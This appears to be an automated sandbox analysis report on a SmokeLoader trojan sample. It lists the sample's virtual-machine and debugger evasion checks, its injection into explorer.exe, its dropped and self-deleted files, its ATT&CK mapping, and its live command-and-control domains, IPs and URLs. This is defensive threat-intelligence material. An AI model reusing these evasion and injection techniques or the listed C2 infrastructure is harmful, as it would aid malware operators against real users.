      Source: C:\Users\user\Desktop\RmbF3635xY.exe | Code function: 0_2_006811E4 pushad ; iretd 0_2_006811E6
      Source: C:\Users\user\AppData\Roaming\jtruajj | Code function: 4_2_0040237B push 000023C2h; retn 0023h 4_2_0040238B
      Source: C:\Users\user\AppData\Roaming\jtruajj | Code function: 4_2_004025DC push ebp; ret 4_2_004025FC
      Source: C:\Users\user\AppData\Roaming\jtruajj | Code function: 4_2_00401284 pushad ; iretd 4_2_00401286
      Source: C:\Users\user\AppData\Roaming\jtruajj | Code function: 4_2_006A2643 push ebp; ret 4_2_006A2663
      Source: C:\Users\user\AppData\Roaming\jtruajj | Code function: 4_2_006A12EB pushad ; iretd 4_2_006A12ED
      Source: C:\Users\user\AppData\Roaming\jtruajj | Code function: 4_2_006A23E2 push 000023C2h; retn 0023h 4_2_006A23F2
      Source: C:\Users\user\AppData\Roaming\jtruajj | Code function: 4_2_0084161C pushad ; iretd 4_2_0084161E
      Source: C:\Users\user\AppData\Roaming\jtruajj | Code function: 4_2_00843141 push es; retf 4_2_00843158
      Source: C:\Users\user\AppData\Roaming\jtruajj | Code function: 4_2_00847E54 push esp; ret 4_2_00847E55
      Source: C:\Users\user\AppData\Roaming\jtruajj | Code function: 4_2_00844871 push ebx; ret 4_2_00844874
      Source: RmbF3635xY.exe | Static PE information: section name: .text entropy: 7.486630625699931
      Source: jtruajj.2.dr | Static PE information: section name: .text entropy: 7.486630625699931
      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\jtruajj
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\jtruajjJump to dropped file

      Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\explorer.exe | File deleted: c:\users\user\desktop\rmbf3635xy.exe
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\jtruajj:Zone.Identifier read attributes | delete
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

Source: C:\Users\user\Desktop\RmbF3635xY.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\jtruajj | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\jtruajj | Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep | graph_4-4067
Source: C:\Users\user\Desktop\RmbF3635xY.exe | Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep | graph_0-4120
Source: C:\Users\user\Desktop\RmbF3635xY.exe | API/Special instruction interceptor: Address: 7FF90818E814
Source: C:\Users\user\Desktop\RmbF3635xY.exe | API/Special instruction interceptor: Address: 7FF90818D584
Source: C:\Users\user\AppData\Roaming\jtruajj | API/Special instruction interceptor: Address: 7FF90818E814
Source: C:\Users\user\AppData\Roaming\jtruajj | API/Special instruction interceptor: Address: 7FF90818D584
Source: jtruajj, 00000004.00000002.1850091879.000000000082E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ASWHOOK
Source: RmbF3635xY.exe, 00000000.00000002.1583122166.000000000066E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ASWHOOKS%XE'
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 417
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 366
Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 889
Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 861
Source: C:\Windows\explorer.exe TID: 1864 | Thread sleep count: 417 > 30
Source: C:\Windows\explorer.exe TID: 6940 | Thread sleep count: 366 > 30
Source: C:\Users\user\Desktop\RmbF3635xY.exe | Code function: 0_2_00418A70 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00513d6ch], 11h and CTI: jne 00418CA4h | 0_2_00418A70
Source: C:\Users\user\AppData\Roaming\jtruajj | Code function: 4_2_00418A70 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00513d6ch], 11h and CTI: jne 00418CA4h | 4_2_00418A70
Source: explorer.exe, 00000002.00000000.1573369849.000000000888E000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: 2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}=
Source: explorer.exe, 00000002.00000000.1573369849.0000000008979000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00`
Source: explorer.exe, 00000002.00000000.1573369849.00000000087C0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NXTVMWare
Source: explorer.exe, 00000002.00000000.1573369849.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2717195196.0000000008796000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWe
Source: explorer.exe, 00000002.00000000.1573369849.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2717195196.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2717195196.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1573369849.00000000087C0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000002.00000000.1569753972.0000000000A44000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000^F1O
Source: explorer.exe, 00000002.00000000.1573369849.00000000087C0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000d
Source: explorer.exe, 00000002.00000000.1573369849.00000000088E6000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000002.00000000.1573369849.00000000088E6000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}l
Source: explorer.exe, 00000002.00000000.1569753972.0000000000A44000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000002.00000000.1573369849.00000000088E6000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.1573369849.00000000088E6000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: explorer.exe, 00000002.00000000.1569753972.0000000000A44000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\RmbF3635xY.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\RmbF3635xY.exe | Process information queried: ProcessInformation

      Anti Debugging

Source: C:\Users\user\Desktop\RmbF3635xY.exe | System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\jtruajj | System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\jtruajj | Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep | graph_4-4067
Source: C:\Users\user\Desktop\RmbF3635xY.exe | Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep | graph_0-4120
Source: C:\Users\user\Desktop\RmbF3635xY.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\jtruajj | Process queried: DebugPort
Source: C:\Users\user\Desktop\RmbF3635xY.exe | Code function: 0_2_005E092B mov eax, dword ptr fs:[00000030h] | 0_2_005E092B
Source: C:\Users\user\Desktop\RmbF3635xY.exe | Code function: 0_2_005E0D90 mov eax, dword ptr fs:[00000030h] | 0_2_005E0D90
Source: C:\Users\user\Desktop\RmbF3635xY.exe | Code function: 0_2_0067FD9C push dword ptr fs:[00000030h] | 0_2_0067FD9C
Source: C:\Users\user\AppData\Roaming\jtruajj | Code function: 4_2_006A092B mov eax, dword ptr fs:[00000030h] | 4_2_006A092B
Source: C:\Users\user\AppData\Roaming\jtruajj | Code function: 4_2_006A0D90 mov eax, dword ptr fs:[00000030h] | 4_2_006A0D90
Source: C:\Users\user\AppData\Roaming\jtruajj | Code function: 4_2_008401D4 push dword ptr fs:[00000030h] | 4_2_008401D4

      HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe | File created: jtruajj.2.dr
Source: C:\Windows\explorer.exe | Network Connect: 188.40.141.211 80
Source: C:\Windows\explorer.exe | Network Connect: 193.46.217.78 80
Source: C:\Users\user\Desktop\RmbF3635xY.exe | Thread created: C:\Windows\explorer.exe EIP: 29919F0
Source: C:\Users\user\AppData\Roaming\jtruajj | Thread created: unknown EIP: 85819F0
Source: C:\Users\user\Desktop\RmbF3635xY.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\Desktop\RmbF3635xY.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Roaming\jtruajj | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\jtruajj | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
Source: explorer.exe, 00000002.00000002.2713075850.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1569996493.0000000001071000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
Source: explorer.exe, 00000002.00000002.2713075850.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1569996493.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.2717195196.00000000087C0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000002.2713075850.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1569996493.0000000001071000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000002.00000002.2713075850.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1569996493.0000000001071000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000002.2712756787.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1569753972.0000000000A44000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Progmanq
Source: C:\Users\user\Desktop\RmbF3635xY.exe | Code function: 0_2_00418A70 InterlockedCompareExchange,GetFocus,ReadConsoleA,FindAtomA,SearchPathA,SetConsoleMode,SearchPathW,GetDefaultCommConfigA,CopyFileExW,CreatePipe,GetEnvironmentStringsW,WriteConsoleOutputA,GetModuleFileNameA,GetSystemTimeAdjustment,ObjectPrivilegeAuditAlarmW,WaitForSingleObject,SetCommState,GetConsoleAliasesLengthW,GetComputerNameA,CopyFileW,GetFileAttributesA,GetConsoleAliasExesLengthW,GetBinaryType,FormatMessageA,GetLongPathNameA,PurgeComm,LoadLibraryA,MoveFileW,InterlockedCompareExchange | 0_2_00418A70
Source: C:\Windows\explorer.exe | Code function: 2_2_02993520 GetUserNameW | 2_2_02993520

      Stealing of Sensitive Information

Source: Yara match | File source: 00000004.00000002.1849964354.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1583016209.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1850069040.00000000007E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2716946130.0000000008581000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1583091687.0000000000621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

Source: Yara match | File source: 00000004.00000002.1849964354.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1583016209.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1850069040.00000000007E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2716946130.0000000008581000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1583091687.0000000000621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix

Tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact.

Techniques with matching signatures (signature count as shown in the matrix):

Execution: Native API (1); Exploitation for Client Execution (1)
Persistence: DLL Side-Loading (1)
Privilege Escalation: Process Injection (32); DLL Side-Loading (1)
Defense Evasion: Masquerading (11); Virtualization/Sandbox Evasion (22); Process Injection (32); Hidden Files and Directories (1); Obfuscated Files or Information (2); Software Packing (12); DLL Side-Loading (1); File Deletion (1)
Discovery: System Time Discovery (11); Security Software Discovery (611); Virtualization/Sandbox Evasion (22); Process Discovery (3); Application Window Discovery (1); Account Discovery (1); System Owner/User Discovery (1); System Information Discovery (23)
Collection: Archive Collected Data (1)
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (2); Non-Application Layer Protocol (3); Application Layer Protocol (113)

Behavior Graph

Behavior Graph ID: 1525800 | Sample: RmbF3635xY.exe | Start date: 04/10/2024 | Architecture: WINDOWS | Score: 100

Start node: RmbF3635xY.exe started; jtruajj started
Start node signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 6 other signatures
Contacted domains: unicexpertmagazine.pw; ceoconstractionstore.pl
RmbF3635xY.exe: Detected unpacking (changes PE section rights); Found evasive API chain (may stop execution after checking system information); Found API chain indicative of debugger detection; 6 other signatures; injects into explorer.exe
jtruajj: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
explorer.exe (injected): connects to ceoconstractionstore.pl 188.40.141.211, ports 49711, 80, HETZNER-ASDE Germany; connects to unicexpertmagazine.pw 193.46.217.78, ports 49710, 49713, 80, CUBENODEES Spain
explorer.exe dropped files: C:\Users\user\AppData\Roaming\jtruajj (PE32); C:\Users\user\...\jtruajj:Zone.Identifier (ASCII)
explorer.exe signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; Deletes itself after installation; Hides that the sample has been downloaded from the Internet (zone.identifier)

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample (Source | Detection | Scanner | Label):
RmbF3635xY.exe | 82% | ReversingLabs | Win32.Trojan.SmokeLoader
RmbF3635xY.exe | 100% | Avira | HEUR/AGEN.1312567
RmbF3635xY.exe | 100% | Joe Sandbox ML

Dropped Files (Source | Detection | Scanner | Label):
C:\Users\user\AppData\Roaming\jtruajj | 100% | Avira | HEUR/AGEN.1312567
C:\Users\user\AppData\Roaming\jtruajj | 100% | Joe Sandbox ML
C:\Users\user\AppData\Roaming\jtruajj | 82% | ReversingLabs | Win32.Trojan.SmokeLoader

Unpacked PE Files: No Antivirus matches
Domains: No Antivirus matches

URLs (Source | Detection | Scanner | Label):
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | 0% | URL Reputation | safe
https://api.msn.com:443/v1/news/Feed/Windows? | 0% | URL Reputation | safe
https://excel.office.com | 0% | URL Reputation | safe
http://schemas.micro | 0% | URL Reputation | safe
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew | 0% | URL Reputation | safe
https://word.office.com | 0% | URL Reputation | safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | 0% | URL Reputation | safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | 0% | URL Reputation | safe
https://outlook.com | 0% | URL Reputation | safe
https://android.notify.windows.com/iOS | 0% | URL Reputation | safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark | 0% | URL Reputation | safe

Contacted Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
ceoconstractionstore.pl | 188.40.141.211 | true | true | (none) | unknown
unicexpertmagazine.pw | 193.46.217.78 | true | true | (none) | unknown

Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
http://openclehardware.ru/index.php | true | (none) | unknown
http://ceoconstractionstore.pl/index.php | true | (none) | unknown
http://informcoopirationunicolceo.ru/index.php | true | (none) | unknown
URLs from Memory and Binaries (Name | Source | Malicious | Antivirus Detection | Reputation):
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua | explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | (none) | unknown
https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-dist | explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | (none) | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://wns.windows.com/bat | explorer.exe, 00000002.00000002.2717195196.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2292315664.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1573369849.000000000899E000.00000004.00000001.00020000.00000000.sdmp | false | (none) | unknown
https://www.stacker.com/arizona/phoenix | explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | (none) | unknown
https://api.msn.com:443/v1/news/Feed/Windows? | explorer.exe, 00000002.00000000.1570427978.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2713649615.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/ | explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | (none) | unknown
https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_de | explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | (none) | unknown
https://excel.office.com | explorer.exe, 00000002.00000000.1575532214.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2722215051.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291027999.000000000BDE7000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.micro | explorer.exe, 00000002.00000000.1573131905.00000000082D0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.2716113298.0000000007670000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1570267826.0000000002C60000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg | explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | (none) | unknown
https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in- | explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | (none) | unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp( | explorer.exe, 00000002.00000003.2292625257.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1575532214.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2721431889.000000000BD22000.00000004.00000001.00020000.00000000.sdmp | false | (none) | unknown
https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri | explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | (none) | unknown
https://parade.com/61481/toriavey/where-did-hamburgers-originate | explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | (none) | unknown
http://qburaxgwiulsnc.com/ | explorer.exe, 00000002.00000003.2292625257.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2721431889.000000000BD22000.00000004.00000001.00020000.00000000.sdmp | false | (none) | unknown
https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch- | explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | (none) | unknown
https://api.msn.com/~T | explorer.exe, 00000002.00000000.1573369849.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2717195196.0000000008796000.00000004.00000001.00020000.00000000.sdmp | false | (none) | unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew | explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb | explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | (none) | unknown
https://android.notify.windows.com/iOSp | explorer.exe, 00000002.00000002.2722215051.000000000BE19000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1575532214.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291599189.000000000BE16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291027999.000000000BDE7000.00000004.00000001.00020000.00000000.sdmp | false | (none) | unknown
https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal | explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | (none) | unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=A1668CA4549A443399161CE8D2237D12&timeOut=5000&oc | explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | (none) | unknown
https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-o | explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | (none) | unknown
https://api.msn.com/rT | explorer.exe, 00000002.00000000.1573369849.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2717195196.0000000008796000.00000004.00000001.00020000.00000000.sdmp | false | (none) | unknown
https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o | explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | (none) | unknown
                                                          unknown
                                                          https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000002.00000000.1573255731.00000000085D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2292146114.00000000085E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-alexplorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://word.office.comexplorer.exe, 00000002.00000000.1575532214.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2722215051.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291027999.000000000BDE7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
